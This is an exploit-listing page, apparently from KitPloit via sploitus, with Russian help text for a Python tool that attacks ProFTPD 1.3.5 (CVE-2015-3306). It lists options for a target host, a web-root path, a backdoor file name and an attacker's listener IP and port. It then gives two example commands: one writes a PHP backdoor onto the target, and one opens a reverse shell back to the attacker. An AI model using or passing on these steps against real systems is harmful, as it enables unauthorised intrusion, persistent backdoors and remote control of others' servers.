## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XM4UD-PROFTPD_CVE-2015-3306
# (m4ud) ProFTPD 1.3.5 RCE эксплойт CVE: 2015-3306!
root@kitploit:~
ProFTPd 1.3.5 RCE
Использование: ProFTPD.py [параметры]
Параметры:
-h, --help показать это сообщение и выйти
-l LHOST, --lhost=LHOST
Локальный IP-адрес для обратной оболочки,
-p LPORT, --lport=LPORT
Порт для обратной оболочки,
-t TARGET, --target=TARGET
Уязвимая цель,
-d DIRECTORY, --dir=DIRECTORY
Корневой каталог веб-сервера для загрузки бэкдора, По умолчанию: /var/www/html
-c COMMAND, --command=COMMAND
Системная команда,
-f FILE, --file=FILE
Имя бэкдора, По умолчанию: shell.php.
ШАГ 1 - Записать бэкдор на целевую машину!
root@kitploit:~
Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
ШАГ 2 - Получить оболочку!!
root@kitploit:~
Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242